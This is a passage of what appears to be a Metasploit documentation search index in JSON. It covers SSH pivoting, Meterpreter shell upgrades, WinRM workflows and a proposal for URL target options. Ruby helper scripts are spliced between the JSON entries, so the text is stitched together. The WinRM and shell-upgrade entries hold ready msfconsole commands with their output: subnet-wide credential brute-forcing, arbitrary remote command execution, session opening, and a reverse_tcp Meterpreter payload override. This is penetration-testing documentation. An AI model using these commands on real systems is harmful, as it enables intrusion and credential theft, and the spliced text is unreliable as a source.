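# Constructed hardened variant: forwarding refused by default, one account
# may reach two internal services only.
HARDENED_SSHD_CONFIG = <<~CONF
  AllowTcpForwarding no          # global: every user refused
  Match User ops
      AllowTcpForwarding local
      PermitOpen 172.18.103.5:445 10.0.0.1:*
CONF

class SshdForwardPolicy
  DEFAULTS = { 'allowtcpforwarding' => 'yes', 'permitopen' => ['any'] }.freeze

  def initialize(config_text)
    @global = {}
    @blocks = [] # [user pattern or :all/:unsupported, options] in file order
    scope = @global
    config_text.each_line do |raw|
      line = raw.sub(/#.*/, '').strip
      next if line.empty?
      key, _, value = line.partition(/\s+/)
      key = key.downcase
      if key == 'match'
        scope = {}
        @blocks << [match_user_pattern(value), scope]
      else
        add_option(scope, key, value)
      end
    end
  end

  # Metasploit's SSH pivoting opens direct-tcpip channels, i.e. "local"
  # forwarding; 'remote' alone does not allow it.
  def local_forward_allowed?(user, host, port)
    opts = effective_options(user)
    return false unless %w[yes all local].include?(opts['allowtcpforwarding'].downcase)
    opens = opts['permitopen'].map(&:downcase)
    return false if opens.include?('none')
    return true if opens.include?('any')
    opens.any? do |entry|
      ohost, sep, oport = entry.rpartition(':')
      next false if sep.empty?
      ohost = ohost.delete('[]')
      (ohost == '*' || ohost == host.downcase) && (oport == '*' || oport == port.to_s)
    end
  end

  private

  # sshd keeps the first value of a keyword within a scope; PermitOpen entries
  # are treated as accumulating (assumption).
  def add_option(scope, key, value)
    if key == 'permitopen'
      (scope[key] ||= []).concat(value.split)
    else
      scope[key] ||= value
    end
  end

  def match_user_pattern(criteria)
    words = criteria.split
    return :all if words.empty? || words.first.casecmp?('all')
    pairs = words.each_slice(2).to_h { |k, v| [k.downcase, v] }
    pairs.fetch('user', :unsupported) # blocks keyed on Address, Group, ... are ignored
  end

  # Values from matching Match blocks override the global section.
  def effective_options(user)
    opts = DEFAULTS.merge(@global)
    @blocks.each do |pattern, block_opts|
      opts = opts.merge(block_opts) if block_matches?(pattern, user)
    end
    opts
  end

  def block_matches?(pattern, user)
    return true if pattern == :all
    return false if pattern == :unsupported
    pattern.split(',').any? { |p| File.fnmatch?(p, user) }
  end
end

# Usage: true for the lab image, false for test_user on the hardened config.
SshdForwardPolicy.new(LAB_SSHD_CONFIG).local_forward_allowed?('test_user', '172.18.103.5', 445)
```

Run it against the sshd_config of a host you already have a session on before adding a route through it: a false answer here is the same administratively prohibited failure the text describes, and tells you which account or PermitOpen entry you would need instead.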
    "url": "/docs/pentesting/metasploit-guide-ssh.html#ssh-workflows",
    "relUrl": "/docs/pentesting/metasploit-guide-ssh.html#ssh-workflows"
  },"586": {
    "doc": "SSH",
    "title": "SSH",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-ssh.html",
    "relUrl": "/docs/pentesting/metasploit-guide-ssh.html"
  },"587": {
    "doc": "Upgrading Shells to Meterpreter",
    "title": "Upgrading shells to Meterpreter",
    "content": "If you have an existing session (Meterpreter, SSH, or a basic command shell), you can open a new Meterpreter session from it with: . sessions -u 3 . To upgrade the most recently opened session to Meterpreter using the sessions command: . sessions -u -1 . Or run the shell_to_meterpreter module manually: . use multi/manage/shell_to_meterpreter run session=-1 run session=-1 win_transfer=POWERSHELL run session=-1 win_transfer=VBS . If you want to upgrade your shell with fine control over which payload is used, set PAYLOAD_OVERRIDE, PLATFORM_OVERRIDE and, on Windows, PSH_ARCH_OVERRIDE. All three options are required to set an override on Windows; the first two are required on other platforms, unless you are not using an override. use multi/manage/shell_to_meterpreter set SESSION 1 set PAYLOAD_OVERRIDE windows/meterpreter/reverse_tcp set PLATFORM_OVERRIDE windows set PSH_ARCH_OVERRIDE x64 . ",
    "url": "/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html#upgrading-shells-to-meterpreter",
    "relUrl": "/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html#upgrading-shells-to-meterpreter"
  },"588": {
    "doc": "Upgrading Shells to Meterpreter",
    "title": "Upgrading Shells to Meterpreter",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html",
    "relUrl": "/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html"
  },"589": {
    "doc": "WinRM",
    "title": "WinRM Workflows",
    "content": "Windows Remote Management (WinRM) is a way for clients to remotely manage Windows computers. WinRM is built on top of the Simple Object Access Protocol (SOAP) over HTTP(S). There are two main ports for WinRM: . | 5985/TCP - HTTP | 5986/TCP - HTTPS | . On older versions of Windows such as Windows 7/Windows Server 2008 the following ports were used: . | 80/TCP - HTTP | 443/TCP - HTTPS | . Important: Before running the chosen WinRM Metasploit module, first ensure that the RPORT and SSL values are configured correctly and agree with each other (plain HTTP on 5985, HTTPS on 5986). Either with the modern inline option support: . use scanner/winrm/winrm_auth_methods run http://192.168.123.139:5985 run https://192.168.123.139:5986 . Or by manually setting options: . use scanner/winrm/winrm_auth_methods set RHOST 192.168.123.139 set RPORT 5985 set SSL false run . Metasploit has support for multiple WinRM modules, including: . | Authentication enumeration | Verifying/bruteforcing credentials | Running commands and opening sessions | . There are more modules than listed here, for the full list of modules run the search command within msfconsole: . msf6 &amp;gt; search winrm . Lab Environment . The WinRM modules work against Windows instances which have WinRM installed and configured. For a domain controller the Allow remote server management through WinRM policy will need to be enabled. It is only possible to use WinRM against accounts which are members of the local Administrators or Remote Management Users group. WinRM over HTTPS requires the creation of a Server Authenticating Certificate, as well as enabling the transport mode: . winrm quickconfig -transport:https . Authentication Enumeration . Enumerate WinRM authentication mechanisms: . use scanner/winrm/winrm_auth_methods run http://192.168.123.139:5985 run https://192.168.123.139:5986 . Example: . 
msf6 auxiliary(scanner/winrm/winrm_auth_methods) &amp;gt; run http://192.168.123.139:5985 [+] 192.168.123.139:5985: Negotiate protocol supported [+] 192.168.123.139:5985: Kerberos protocol supported [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed . WinRM Bruteforce . Brute-force host with known user and password list: . use scanner/winrm/winrm_login run https://[email protected]:5986 threads=50 pass_file=./wordlist.txt . Brute-force credentials: . use scanner/winrm/winrm_login run http://192.168.123.139:5985 threads=50 user_file=./users.txt pass_file=./wordlist.txt . Brute-force credentials in a subnet: . use scanner/winrm/winrm_login run cidr:/24:http://user:[email protected]:5985 threads=50 run cidr:/24:http://[email protected]:5985 threads=50 pass_file=./wordlist.txt . WinRM CMD . To execute arbitrary commands against a Windows target: . use scanner/winrm/winrm_cmd run http://user:[email protected]:5985 cmd='whoami; ipconfig; systeminfo' . WinRM Login Session . If you have valid credentials the scanner/winrm/winrm_login module will open a Metasploit session for you: . use scanner/winrm/winrm_login run http://user:[email protected]:5985 . Example: . msf6 auxiliary(scanner/winrm/winrm_login) &amp;gt; run http://user:[email protected]:5985 [!] No active DB -- Credential data will not be saved! [+] 192.168.123.139:5985 - Login Successful: WORKSTATION\\user:pass [*] Command shell session 7 opened (192.168.123.1:58673 -&amp;gt; 192.168.123.139:5985 ) at 2022-04-23 02:36:34 +0100 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/winrm/winrm_login) &amp;gt; sessions -i -1 [*] Starting interaction with 7... Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\\Users\\user&amp;gt; . Kerberos Authentication . Details on the Kerberos specific option names are documented in Kerberos Service Authentication . Open a WinRM session: . 
msf6 &amp;gt; use auxiliary/scanner/winrm/winrm_login msf6 auxiliary(scanner/winrm/winrm_login) &amp;gt; run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local [+] 192.168.123.13:88 - Received a valid TGT-Response [*] 192.168.123.13:5985 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin [+] 192.168.123.13:88 - Received a valid TGS-Response [*] 192.168.123.13:5985 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_889546.bin [+] 192.168.123.13:88 - Received a valid delegation TGS-Response [+] 192.168.123.13:88 - Received AP-REQ. Extracting session key... [+] 192.168.123.13:5985 - Login Successful: demo.local\\Administrator:p4$$w0rd [*] Command shell session 1 opened (192.168.123.1:50722 -&amp;gt; 192.168.123.13:5985) at 2023-01-18 12:06:05 +0000 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/winrm/winrm_login) &amp;gt; sessions -i -1 [*] Starting interaction with 1... Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\\Users\\Administrator&amp;gt; . ",
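The authentication enumeration above, as an added example that is not the winrm_auth_methods module: the mechanisms a WinRM list reports come from the WWW-Authenticate headers a listener returns for an unauthenticated POST to /wsman. SAMPLE_401 is a constructed response; winrm_auth_methods parses the header values, winrm_findings turns them into the caveats a tester cares about (notably Basic over plain HTTP, and the page's winrm::auth=kerberos option when Kerberos is offered), and probe_winrm performs the live request, which is assumed to match the module's approach and is not exercised offline. As the page stresses, the port and the SSL flag must agree.

```ruby
# Added example, not the winrm_auth_methods module: enumerate WinRM auth
# mechanisms from the 401 answer to an unauthenticated request.
require 'net/http'

# Constructed sample of a WinRM listener's reply to POST /wsman without
# credentials (one WWW-Authenticate header per mechanism; the Server banner
# is illustrative).
SAMPLE_401 = [
  'HTTP/1.1 401 ',
  'Server: Microsoft-HTTPAPI/2.0',
  'WWW-Authenticate: Negotiate',
  'WWW-Authenticate: Kerberos',
  'WWW-Authenticate: Basic realm="WSMAN"',
  'Content-Length: 0',
  '',
  ''
].join("\r\n").freeze

# WWW-Authenticate values from a raw HTTP response head.
def www_authenticate_from_raw(raw)
  raw.split("\r\n\r\n", 2).first.split("\r\n")
     .select { |l| l.downcase.start_with?('www-authenticate:') }
     .map { |l| l.split(':', 2).last.strip }
end

# Mechanism names (lowercased, deduplicated) from header values; one value
# may list several schemes separated by commas.
def winrm_auth_methods(header_values)
  header_values.flat_map { |v| v.split(',') }
               .map { |v| v.strip.split(/\s+/).first }
               .compact.map(&:downcase).uniq
end

# Caveats a tester wants before choosing credentials and transport.
def winrm_findings(methods, ssl:)
  findings = []
  if methods.include?('basic') && !ssl
    findings << 'basic auth over plain HTTP: credentials cross the wire base64-encoded only'
  end
  if methods.include?('kerberos')
    findings << 'kerberos offered: winrm::auth=kerberos with winrm::rhostname set to the FQDN avoids NTLM'
  end
  findings
end

# Live probe (not exercised offline). RPORT and SSL must agree: 5985 with
# http, 5986 with https. The empty POST to /wsman is assumed to match what the
# module sends.
def probe_winrm(url)
  uri = URI(url)
  http = Net::HTTP.new(uri.host, uri.port)
  http.use_ssl = (uri.scheme == 'https')
  res = http.post('/wsman', '', 'Content-Type' => 'application/soap+xml;charset=UTF-8')
  methods = winrm_auth_methods(res.get_fields('www-authenticate') || [])
  { status: res.code, methods: methods, findings: winrm_findings(methods, ssl: http.use_ssl?) }
end

# Usage: offline against the constructed response.
winrm_findings(winrm_auth_methods(www_authenticate_from_raw(SAMPLE_401)), ssl: false)
```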
    "url": "/docs/pentesting/metasploit-guide-winrm.html#winrm-workflows",
    "relUrl": "/docs/pentesting/metasploit-guide-winrm.html#winrm-workflows"
  },"590": {
    "doc": "WinRM",
    "title": "WinRM",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-winrm.html",
    "relUrl": "/docs/pentesting/metasploit-guide-winrm.html"
  },"591": {
    "doc": "Metasploit Hackathons",
    "title": "Metasploit Hackathons",
    "content": "2016 . We hosted the first general Metasploit hackathon at the Rapid7 Austin Office on Thursday 2016-09-15, starting at noon (12pm) CST and going until 10am CST the following day. Got a cool Meterpreter extension you have wanted to try, module to write, or feature to add? We’ll be working both on new things and shepherding old-but-awesome things. Come join us on #metasploit on Freenode as well. 2017 . We hosted the second general Metasploit hackathon at the Rapid7 Austin Office and the Hyatt Place Arboretum, 2017-06-22 through 2017-06-25, including 15 developers. Combine a rotating cast of contributors, way too much food, a couple of guitars, and some incredibly outsized laptops, and you end up with some great Metasploit hacking and fun. ",
    "url": "/docs/development/maintainers/metasploit-hackathons.html",
    "relUrl": "/docs/development/maintainers/metasploit-hackathons.html"
  },"592": {
    "doc": "Metasploit Loginpalooza",
    "title": "Modules to Refactor",
    "content": ". | auxiliary/gather/apache_rave_creds.rb | auxiliary/scanner/http/apache_userdir_enum.rb | auxiliary/voip/asterisk_login.rb | post/osx/gather/autologin_password.rb | auxiliary/scanner/http/axis_local_file_include.rb | exploits/windows/http/ca_arcserve_rpc_authbypass.rb | auxiliary/scanner/misc/cctv_dvr_login.rb | auxiliary/scanner/http/cisco_asa_asdm.rb | auxiliary/scanner/http/cisco_ironport_enum.rb | auxiliary/scanner/couchdb/couchdb_login.rb | auxiliary/gather/d20pass.rb | auxiliary/scanner/http/dell_idrac.rb | auxiliary/scanner/http/dlink_dir_300_615_http_login.rb | auxiliary/scanner/http/dlink_dir_615h_http_login.rb | auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb | auxiliary/scanner/http/dolibarr_login.rb | auxiliary/gather/doliwamp_traversal_creds.rb | auxiliary/server/capture/drda.rb | auxiliary/scanner/http/drupal_views_user_enum.rb | auxiliary/scanner/misc/dvr_config_disclosure.rb | auxiliary/gather/eaton_nsm_creds.rb | auxiliary/scanner/http/ektron_cms400net.rb | post/osx/gather/enum_osx.rb | post/windows/gather/enum_snmp.rb | post/windows/gather/enum_tomcat.rb | post/multi/gather/filezilla_client_cred.rb | exploits/multi/http/glassfish_deployer.rb | auxiliary/scanner/http/glassfish_login.rb | auxiliary/gather/hp_snac_domain_creds.rb | auxiliary/scanner/http/infovista_enum.rb | auxiliary/scanner/ipmi/ipmi_dumphashes.rb | auxiliary/scanner/oracle/isqlplus_login.rb | auxiliary/scanner/oracle/isqlplus_sidbrute.rb | exploits/linux/http/kloxo_sqli.rb | auxiliary/scanner/scada/koyo_login.rb | auxiliary/scanner/telnet/lantronix_telnet_password.rb | auxiliary/scanner/lotus/lotus_domino_hashes.rb | auxiliary/scanner/lotus/lotus_domino_login.rb | auxiliary/scanner/mongodb/mongodb_login.rb | post/linux/gather/mount_cifs_creds.rb | auxiliary/scanner/msf/msf_rpc_login.rb | auxiliary/scanner/msf/msf_web_login.rb | auxiliary/scanner/nessus/nessus_ntp_login.rb | auxiliary/scanner/nessus/nessus_xmlrpc_login.rb | 
auxiliary/scanner/nexpose/nexpose_api_login.rb | auxiliary/scanner/http/novell_mdm_creds.rb | auxiliary/scanner/misc/oki_scanner.rb | auxiliary/scanner/http/openmind_messageos_login.rb | auxiliary/scanner/openvas/openvas_gsad_login.rb | auxiliary/scanner/openvas/openvas_omp_login.rb | auxiliary/scanner/openvas/openvas_otp_login.rb | auxiliary/scanner/http/oracle_ilom_login.rb | post/windows/gather/credentials/outlook.rb | auxiliary/scanner/http/owa_login.rb | auxiliary/scanner/pcanywhere/pcanywhere_login.rb | post/multi/gather/pgpass_creds.rb | auxiliary/scanner/postgres/postgres_version.rb | post/linux/gather/pptpd_chap_secrets.rb | auxiliary/scanner/http/radware_appdirector_enum.rb | auxiliary/scanner/misc/raysharp_dvr_passwords.rb | post/windows/gather/credentials/razer_synapse.rb | post/windows/gather/credentials/razorsql.rb | auxiliary/scanner/rservices/rexec_login.rb | auxiliary/scanner/http/rfcode_reader_enum.rb | auxiliary/scanner/rservices/rlogin_login.rb | auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb | auxiliary/scanner/rservices/rsh_login.rb | auxiliary/scanner/http/sap_businessobjects_user_brute.rb | auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb | auxiliary/scanner/http/sap_businessobjects_user_enum.rb | auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb | auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb | auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb | auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb | auxiliary/scanner/sap/sap_web_gui_brute_login.rb | auxiliary/scanner/http/sentry_cdu_enum.rb | auxiliary/scanner/http/sevone_enum.rb | auxiliary/scanner/oracle/sid_brute.rb | auxiliary/admin/oracle/sid_brute.rb | auxiliary/server/capture/sip.rb | post/windows/gather/credentials/smartermail.rb | post/windows/gather/credentials/spark_im.rb | auxiliary/scanner/http/splunk_web_login.rb | auxiliary/scanner/http/squiz_matrix_user_enum.rb | auxiliary/scanner/ssh/ssh_identify_pubkeys.rb | 
auxiliary/scanner/telnet/telnet_ruggedcom.rb | auxiliary/scanner/http/titan_ftp_admin_pwd.rb | auxiliary/scanner/http/tomcat_enum.rb | post/windows/gather/credentials/tortoisesvn.rb | post/windows/gather/credentials/total_commander.rb | auxiliary/scanner/http/typo3_bruteforce.rb | auxiliary/gather/vbulletin_vote_sqli.rb | exploits/unix/webapp/vbulletin_vote_sqli_exec.rb | auxiliary/scanner/http/vcms_login.rb | auxiliary/scanner/vmware/vmware_http_login.rb | auxiliary/scanner/dcerpc/windows_deployment_services.rb | auxiliary/scanner/http/wordpress_login_enum.rb | auxiliary/gather/wp_w3_total_cache_hash_extract.rb | . Special attention needed . | post/windows/gather/enum_domain.rb - Partials, should create realms but not full cores | post/windows/gather/enum_domain_group_users.rb - Should create realms and publics but won’t be able to get privates | post/windows/gather/enum_domains.rb - Creates realms | post/windows/gather/enum_logged_on_users.rb - Creates publics but not privates | . ",
    "url": "/docs/development/maintainers/metasploit-loginpalooza.html#modules-to-refactor",
    "relUrl": "/docs/development/maintainers/metasploit-loginpalooza.html#modules-to-refactor"
  },"593": {
    "doc": "Metasploit Loginpalooza",
    "title": "Metasploit Loginpalooza",
    "content": "The Loginpalooza contest is over! Congrats and thanks to @TomSellers, @ChrisTruncer, and @0a2940! . The list of modules to refactor is still here. Modules that get refactored should be removed from the list entirely. If you’d like to learn how to convert your favorite existing module, or write a new module, using the new LoginScanner mixin and the Credentials gem, please take a look at Creating Metasploit Framework LoginScanners. ",
    "url": "/docs/development/maintainers/metasploit-loginpalooza.html",
    "relUrl": "/docs/development/maintainers/metasploit-loginpalooza.html"
  },"594": {
    "doc": "Metasploit URL support proposal",
    "title": "Problems",
    "content": " ",
    "url": "/docs/development/propsals/metasploit-url-support-proposal.html#problems",
    "relUrl": "/docs/development/propsals/metasploit-url-support-proposal.html#problems"
  },"595": {
    "doc": "Metasploit URL support proposal",
    "title": "Multiple Options",
    "content": "Metasploit currently provides multiple options for configuring target details: . | RHOSTS | RPORT | VHOST | TARGETURI | SSL | USER | PASS | . Configuring this many options is cumbersome and time consuming on a per module basis. Although it is possible to set common values globally with the setg command and to override the ports individually on a per module basis, it is still an arduous task: . setg RHOSTS x.x.x.x use module/foo set RPORT yyy run . Running module against unique targets . Running a module against multiple targets with independent ports and target paths is currently verbose, because each target must be configured manually: . use module/foo set RHOST target1 set TARGETURI /jenkins run set RHOST target2 set TARGETURI /admin/jenkins run . ",
    "url": "/docs/development/propsals/metasploit-url-support-proposal.html#multiple-options",
    "relUrl": "/docs/development/propsals/metasploit-url-support-proposal.html#multiple-options"
  },"596": {
    "doc": "Metasploit URL support proposal",
    "title": "Approaches",
    "content": "So far there are three main potential approaches to add URL support to msfconsole: . | Consolidating Options - Combining multiple options such as RHOST/RPORT/SSL/etc into one new option: TARGETS | Enriching RHOSTS with URL support - The RHOSTS option is modified to support URLs, and attempts to keep all options such as RHOST/PORT/SSL etc in sync. | Support setting a single RHOST_URL - Metasploit console will now support setting a single RHOST_URL value. Note that this wouldn’t show as an option to the user, but would be used as a ‘macro’ to populate the existing datastore values | . ",
    "url": "/docs/development/propsals/metasploit-url-support-proposal.html#approaches",
    "relUrl": "/docs/development/propsals/metasploit-url-support-proposal.html#approaches"
  },"597": {
    "doc": "Metasploit URL support proposal",
    "title": "1. Consolidating Options",
    "content": "Combining the module target options into one would help reduce the amount of steps required to configure a module: . set TARGETS https://user:password@target_app:4343 . When the user views the options for a given module, it will be consolidated. The user will no longer see options such as RPORT, SSL . Before . Multiple options are available for configuring the module options: . msf5 exploit(multi/http/tomcat_mgr_upload) &amp;gt; options Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Java Universal . After . Multiple options are consolidated into a single TARGETS field: . msf5 exploit(multi/http/tomcat_mgr_upload) &amp;gt; options Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST_URLS yes The target host URL(s), or file with syntax 'file:&amp;lt;path&amp;gt;' Exploit target: Id Name -- ---- 0 Java Universal . Examples . It is now possible to run an individual module against different hosts, paths, and ports: . use exploit/multi/http/jenkins_script_console set TARGETS http://target1:9000/jenkins, http://target2:8080/admin/jenkins check . It is now possible to run an individual module against different hosts, paths, and ports: . 
use auxiliary/scanner/http/title set TARGETS https://google.com http://example.com run . It would still be possible to use IPv4/IPv6/CIDR syntax directly: . set TARGETS 192.168.1.5:139 . However, it is no longer clear how to use CIDR notation and set path information, other than making up a new syntax: . set TARGETS https://10.0.0.0/24:8080/some/app . Advantages . | As a user it’s now easy to configure one option | A single option is less overwhelming to the user when viewing the available module options | The user can directly copy/paste a URL from their browser into msfconsole to run a check module against | A module can now be run against multiple arbitrary targets with independent paths / ports | Helps to catch improperly set ports. For instance, setting the SSL option to true - but forgetting to update RPORT to 443 | Simple to implement with a known effort | . Disadvantages . | The option consolidation breaks the majority of existing module documentation | It’s no longer clear how to use CIDR notation and set path information, other than making up a new syntax | Breaks the user’s existing muscle memory for configuring modules | Hard to make a change to a single value, i.e. setting targets then wishing to modify the target URI or port uniformly | Lose the ability to easily set a single global RHOST value, and set the ports individually on a per-module basis | We lose the ability to have sane defaults set for options, such as: . | TARGETURI = /manager | RPORT = 139 | . | The modules additionally lose the descriptive metadata for the significance of fields, such as TARGETURI: | . Module options (exploit/multi/http/jenkins_script_console): Name Current Setting Required Description ---- --------------- -------- ----------- ... TARGETURI /jenkins/ yes The path to the Jenkins-CI application ... ",
    "url": "/docs/development/propsals/metasploit-url-support-proposal.html#1-consolidating-options",
    "relUrl": "/docs/development/propsals/metasploit-url-support-proposal.html#1-consolidating-options"
  },"598": {
    "doc": "Metasploit URL support proposal",
    "title": "2. Enriching RHOSTS with URL support",
    "content": "The RHOSTS field is updated to support a URL formats: . set RHOSTS http://target1:9000/jenkins . Before / After . The multiple options are still available to the user, there is no change to this behavior: . set RHOSTS https://a.site.com/foo Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS https://a.site.com/foo yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections TARGETURI /foo yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com no HTTP server virtual host . Examples . The use of RHOSTS continues to be a valid option name: . set RHOSTS https://a.site.com/foo . The options are now individually updated with corresponding values: . set RHOSTS https://a.site.com/foo Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS https://a.site.com/foo yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections TARGETURI /foo yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com no HTTP server virtual host . If the user wishes to update an individual option, the rhost’s value will be recomputed: . 
set RHOSTS https://a.site.com/foo set TARGETURI /bar Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS https://a.site.com/bar yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections TARGETURI /bar yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com no HTTP server virtual host . The user can set multiple RHOSTS, with each option being comma delimited within the options table: . set RHOSTS https://a.site.com/foo http://b.site.com/bar Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS https://a.site.com/bar, http://b.site.com/bar yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 443, 80 yes The target port (TCP) SSL true, false no Negotiate SSL/TLS for outgoing connections TARGETURI /foo, /bar yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com, b.site.com no HTTP server virtual host . The user can continue to override individual options uniformly: . 
set RHOSTS https://a.site.com/foo http://b.site.com/bar set TARGETURI /new Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS https://a.site.com/new, http://b.site.com/new yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 443, 80 yes The target port (TCP) SSL true, false no Negotiate SSL/TLS for outgoing connections TARGETURI /new yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com, b.site.com no HTTP server virtual host . The user can set new path values individually: . set RHOSTS https://a.site.com/foo http://b.site.com/bar set TARGETURI /abc /xyz Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS https://a.site.com/abc http://b.site.com/xyz yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 443, 80 yes The target port (TCP) SSL true, false no Negotiate SSL/TLS for outgoing connections TARGETURI /abc, /xyz yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com, b.site.com no HTTP server virtual host . Alternatively: The above scenario is intuitive when used with multiple RHOSTS, however when a single RHOST is used the user may intend for setting TARGETURI to behave differently. In this scenario the user may expect two scans to be run against the single target: . 
set RHOSTS https://a.site.com/foo set TARGETURI /abc /xyz Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS https://a.site.com/abc https://a.site.com/xyz yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 443, 80 yes The target port (TCP) SSL true, false no Negotiate SSL/TLS for outgoing connections TARGETURI /abc, /xyz yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com, a.site.com no HTTP server virtual host . It’s still possible to use the CIDR range notation, but the support remains closer to the current Metasploit console workflow: . set RHOSTS 192.168.100.0/22 set TARGETURI /tomcat set SSL true Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.100.0/22 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL true, false no Negotiate SSL/TLS for outgoing connections TARGETURI /tomcat yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST no HTTP server virtual host . Advantages . | It’s possible to configure the target with one set command | Backwards compatible | The user can directly copy/paste a URL from their browser into msfconsole to run a check module against | A module can now be run against multiple arbitrary targets with independent paths / ports | Helps to catch improperly set ports. 
For instance, setting the SSL option to true - but forgetting to update RPORT to 443 | The existing metadata/options remains intact for the user to view | CIDR notation can continue to be used | . Disadvantages . | This is a novel implementation effort. The current design of Metasploit framework’s Options/Datastore doesn’t support computed / dependent options. | More complicated to implement than a single TARGETS option | The intuition of computed options paired with last write winning might be confusing to users - but this would need to be tested | . ",
    "url": "/docs/development/propsals/metasploit-url-support-proposal.html#2-enriching-rhosts-with-url-support",
    "relUrl": "/docs/development/propsals/metasploit-url-support-proposal.html#2-enriching-rhosts-with-url-support"
  },"599": {
    "doc": "Metasploit URL support proposal",
    "title": "3. Support setting a single RHOST_URL",
